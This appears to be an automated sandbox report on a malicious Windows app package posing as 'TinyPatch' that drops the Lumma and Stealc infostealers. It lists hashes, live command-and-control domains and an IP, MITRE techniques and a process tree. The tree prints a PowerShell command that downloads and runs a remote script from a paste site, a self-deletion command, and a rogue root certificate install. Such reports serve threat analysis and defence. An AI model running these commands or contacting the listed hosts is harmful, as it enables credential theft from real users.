lumma | 790b8ec5a42591a245011d49484da552d65544354fb6c5a993443eedbc65ee7a

Analysis

max time kernel
86s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-10-2024 00:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

790b8ec5a42591a245011d49484da552d65544354fb6c5a993443eedbc65ee7a.appx
Size

63.4MB
MD5

8a3b1b5afd0271e204325ce9eb9158fe
SHA1

1ef496e949d1604df04e01bb671481b605bf19b8
SHA256

790b8ec5a42591a245011d49484da552d65544354fb6c5a993443eedbc65ee7a
SHA512

a7fd6a354c9b3a0696d6d6daea0bddd4b53d2d438a4af2cd37e068c479e9156708ad39ce6cf59b3318aa166c95e62f3fefb3b93219ff4364bce8c66ae6082028
SSDEEP

1572864:SLq4DIntRFxi0ef09rzefa/ythYOZdWFS/lz5dowWM:SLq4DInDFKf0lzea/yF8FSvdowj

Score

10^/10

lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

lumma

https://drawwyobstacw.sbs

https://condifendteu.sbs

https://ehticsprocw.sbs

https://vennurviot.sbs

https://resinedyw.sbs

https://enlargkiw.sbs

https://allocatinow.sbs

https://mathcucom.sbs

Extracted

Family

stealc

Botnet

mainteam

http://95.182.96.50

Attributes

url_path
/2aced82320799c96.php

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Blocklisted process makes network request 3 IoCs

flow	pid	Process
92	924	powershell.exe
95	924	powershell.exe
98	924	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
924	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
3292	1.exe
2984	1.exe
1256	2.exe
1284	3.exe

Loads dropped DLL 64 IoCs

pid	Process
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe
4136	TinyPatch.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
94	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2984 set thread context of 4832	2984	1.exe	101
PID 1256 set thread context of 4324	1256	2.exe	107
PID 1284 set thread context of 4360	1284	3.exe	111

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\LPC\1.exe	TinyPatch.exe
File created	C:\Program Files\launcher289\1.exe	1.exe
File created	C:\Program Files\launcher289\2.exe	1.exe
File created	C:\Program Files\launcher289\3.exe	1.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BitLockerToGo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BitLockerToGo.exe

GoLang User-Agent 8 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	87	Go-http-client/1.1
HTTP User-Agent header	29	Go-http-client/1.1
HTTP User-Agent header	46	Go-http-client/1.1
HTTP User-Agent header	47	Go-http-client/1.1
HTTP User-Agent header	48	Go-http-client/1.1
HTTP User-Agent header	68	Go-http-client/1.1
HTTP User-Agent header	71	Go-http-client/1.1
HTTP User-Agent header	84	Go-http-client/1.1

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	1.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3800	powershell.exe
3800	powershell.exe
4136	TinyPatch.exe
4368	powershell.exe
4368	powershell.exe
4324	BitLockerToGo.exe
4324	BitLockerToGo.exe
4324	BitLockerToGo.exe
4324	BitLockerToGo.exe
924	powershell.exe
924	powershell.exe
924	powershell.exe
924	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	4136	TinyPatch.exe
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeIncreaseQuotaPrivilege	4932	wmic.exe
Token: SeSecurityPrivilege	4932	wmic.exe
Token: SeTakeOwnershipPrivilege	4932	wmic.exe
Token: SeLoadDriverPrivilege	4932	wmic.exe
Token: SeSystemProfilePrivilege	4932	wmic.exe
Token: SeSystemtimePrivilege	4932	wmic.exe
Token: SeProfSingleProcessPrivilege	4932	wmic.exe
Token: SeIncBasePriorityPrivilege	4932	wmic.exe
Token: SeCreatePagefilePrivilege	4932	wmic.exe
Token: SeBackupPrivilege	4932	wmic.exe
Token: SeRestorePrivilege	4932	wmic.exe
Token: SeShutdownPrivilege	4932	wmic.exe
Token: SeDebugPrivilege	4932	wmic.exe
Token: SeSystemEnvironmentPrivilege	4932	wmic.exe
Token: SeRemoteShutdownPrivilege	4932	wmic.exe
Token: SeUndockPrivilege	4932	wmic.exe
Token: SeManageVolumePrivilege	4932	wmic.exe
Token: 33	4932	wmic.exe
Token: 34	4932	wmic.exe
Token: 35	4932	wmic.exe
Token: 36	4932	wmic.exe
Token: SeIncreaseQuotaPrivilege	4932	wmic.exe
Token: SeSecurityPrivilege	4932	wmic.exe
Token: SeTakeOwnershipPrivilege	4932	wmic.exe
Token: SeLoadDriverPrivilege	4932	wmic.exe
Token: SeSystemProfilePrivilege	4932	wmic.exe
Token: SeSystemtimePrivilege	4932	wmic.exe
Token: SeProfSingleProcessPrivilege	4932	wmic.exe
Token: SeIncBasePriorityPrivilege	4932	wmic.exe
Token: SeCreatePagefilePrivilege	4932	wmic.exe
Token: SeBackupPrivilege	4932	wmic.exe
Token: SeRestorePrivilege	4932	wmic.exe
Token: SeShutdownPrivilege	4932	wmic.exe
Token: SeDebugPrivilege	4932	wmic.exe
Token: SeSystemEnvironmentPrivilege	4932	wmic.exe
Token: SeRemoteShutdownPrivilege	4932	wmic.exe
Token: SeUndockPrivilege	4932	wmic.exe
Token: SeManageVolumePrivilege	4932	wmic.exe
Token: 33	4932	wmic.exe
Token: 34	4932	wmic.exe
Token: 35	4932	wmic.exe
Token: 36	4932	wmic.exe
Token: SeIncreaseQuotaPrivilege	4076	wmic.exe
Token: SeSecurityPrivilege	4076	wmic.exe
Token: SeTakeOwnershipPrivilege	4076	wmic.exe
Token: SeLoadDriverPrivilege	4076	wmic.exe
Token: SeSystemProfilePrivilege	4076	wmic.exe
Token: SeSystemtimePrivilege	4076	wmic.exe
Token: SeProfSingleProcessPrivilege	4076	wmic.exe
Token: SeIncBasePriorityPrivilege	4076	wmic.exe
Token: SeCreatePagefilePrivilege	4076	wmic.exe
Token: SeBackupPrivilege	4076	wmic.exe
Token: SeRestorePrivilege	4076	wmic.exe
Token: SeShutdownPrivilege	4076	wmic.exe
Token: SeDebugPrivilege	4076	wmic.exe
Token: SeSystemEnvironmentPrivilege	4076	wmic.exe
Token: SeRemoteShutdownPrivilege	4076	wmic.exe
Token: SeUndockPrivilege	4076	wmic.exe
Token: SeManageVolumePrivilege	4076	wmic.exe
Token: 33	4076	wmic.exe
Token: 34	4076	wmic.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 4136 wrote to memory of 3292	4136	TinyPatch.exe	88
PID 4136 wrote to memory of 3292	4136	TinyPatch.exe	88
PID 3292 wrote to memory of 4368	3292	1.exe	89
PID 3292 wrote to memory of 4368	3292	1.exe	89
PID 3292 wrote to memory of 4932	3292	1.exe	92
PID 3292 wrote to memory of 4932	3292	1.exe	92
PID 3292 wrote to memory of 2984	3292	1.exe	96
PID 3292 wrote to memory of 2984	3292	1.exe	96
PID 3292 wrote to memory of 2984	3292	1.exe	96
PID 3292 wrote to memory of 4076	3292	1.exe	97
PID 3292 wrote to memory of 4076	3292	1.exe	97
PID 3292 wrote to memory of 4680	3292	1.exe	99
PID 3292 wrote to memory of 4680	3292	1.exe	99
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 2984 wrote to memory of 4832	2984	1.exe	101
PID 3292 wrote to memory of 1256	3292	1.exe	102
PID 3292 wrote to memory of 1256	3292	1.exe	102
PID 3292 wrote to memory of 1256	3292	1.exe	102
PID 3292 wrote to memory of 3776	3292	1.exe	103
PID 3292 wrote to memory of 3776	3292	1.exe	103
PID 3292 wrote to memory of 1760	3292	1.exe	105
PID 3292 wrote to memory of 1760	3292	1.exe	105
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 1256 wrote to memory of 4324	1256	2.exe	107
PID 3292 wrote to memory of 1284	3292	1.exe	108
PID 3292 wrote to memory of 1284	3292	1.exe	108
PID 3292 wrote to memory of 1284	3292	1.exe	108
PID 3292 wrote to memory of 372	3292	1.exe	109
PID 3292 wrote to memory of 372	3292	1.exe	109
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 1284 wrote to memory of 4360	1284	3.exe	111
PID 4360 wrote to memory of 924	4360	BitLockerToGo.exe	112
PID 4360 wrote to memory of 924	4360	BitLockerToGo.exe	112
PID 4360 wrote to memory of 924	4360	BitLockerToGo.exe	112
PID 4360 wrote to memory of 696	4360	BitLockerToGo.exe	114
PID 4360 wrote to memory of 696	4360	BitLockerToGo.exe	114
PID 4360 wrote to memory of 696	4360	BitLockerToGo.exe	114
PID 924 wrote to memory of 208	924	powershell.exe	116
PID 924 wrote to memory of 208	924	powershell.exe	116
PID 924 wrote to memory of 208	924	powershell.exe	116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:AppsFolder\8f814315-31a0-4b6d-b344-a6c0f73c020f_3s1acx2251sn2!App
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Program Files\WindowsApps\8f814315-31a0-4b6d-b344-a6c0f73c020f_1.9.30.0_x64__3s1acx2251sn2\TinyPatch\TinyPatch.exe
"C:\Program Files\WindowsApps\8f814315-31a0-4b6d-b344-a6c0f73c020f_1.9.30.0_x64__3s1acx2251sn2\TinyPatch\TinyPatch.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4136
- C:\Program Files\LPC\1.exe
  "C:\Program Files\LPC\1.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4368
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Program Files\launcher289\1.exe
    "C:\Program Files\launcher289\1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2984
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4832
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4076
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    PID:4680
- - C:\Program Files\launcher289\2.exe
    "C:\Program Files\launcher289\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1256
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4324
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    PID:3776
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    PID:1760
- - C:\Program Files\launcher289\3.exe
    "C:\Program Files\launcher289\3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1284
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:924
      - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups /fo csv
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:208
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:696
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get name
    3⤵
    PID:372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\D3DCompiler_47_cor3.dll

Filesize
4.7MB

MD5
c4974c924b605bd322c4872d72de90d1

SHA1
20df9433eab24d3291696046646f493794b77cba

SHA256
71d766b4742ca9f7422bb2efc3dc03f2cee509a5a43d241e748cda7aaac24bf4

SHA512
3889648dbb4608ece9c68f1cd5b1601da5b795eade7910764dd4769090cdb209a39acf3986e6e7190745f3bc6b1477a52dfaccb96a7e799eafc0825e2c44a846

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\DirectWriteForwarder.dll

Filesize
491KB

MD5
a1aec6b3f64bb37ffe136918de13e4f2

SHA1
4ec11db15f285e488f59cf02708ee4b32d505dc5

SHA256
ad94af9432b6d5322d265d60070d3ff49f1ba1012e0c367fc8364d1c595e1ca6

SHA512
14ffca7a127c6f806d5316448a49ac5440d0c7c8f6dc3725b4fd945fa06675ac09e3d33008c9de08af3ffab2ce91fd9c4a3c6a05713464a3115f7ed459b4e539

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\Microsoft.Win32.Primitives.dll

Filesize
21KB

MD5
27b3ee8d64b2b1290eaf90bfe7d0b009

SHA1
d30b53d53f0258666987f9a9fc15c862c6f36935

SHA256
5905b9e94aae08d2d8e63a5d907493d89f98153ec95b43e241db5e3a3c6f5bb9

SHA512
cc9910757bf24efead841d0632e95bf8a24577bc762391944dd6a82048984140a3f373ccdbaa3f9869e9f38c72213eeaaaad90dd318b3870a4b827e265292c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\Microsoft.Win32.Registry.dll

Filesize
81KB

MD5
893b2cff039236aeb623dd8ea269cded

SHA1
9f0d9c6995e90717c1d8644036d5bedd7740af4b

SHA256
b88fd3261604df67b5c107bf6e8f5449c9504b4040c45629abfaf85c42ff89b0

SHA512
f7c2add8591677ea5baeadf4f168db839f82af75da85425faa8ee48400dbff14daf216365cc5d574abd7b327ee6e9d2a73865768169ec3886a8b30523ae4cebb

Download Submit
C:\Users\Admin\AppData\Local\Temp\.net\TinyPatch\6G5XtFK8co76wuTw5oyG2Yy+i6DmT0w=\PresentationCore.dll

Filesize
8.3MB

MD5
0b1cca36b80b6681bf3dd5c3fcbc386d

SHA1
0854aef162eca94263e53fb23069cce545849ed6

SHA256
4a5a0264e0b235c4bfe0aaebd58bffb34852ec6c1665324e972a0af8819c2af2

SHA512
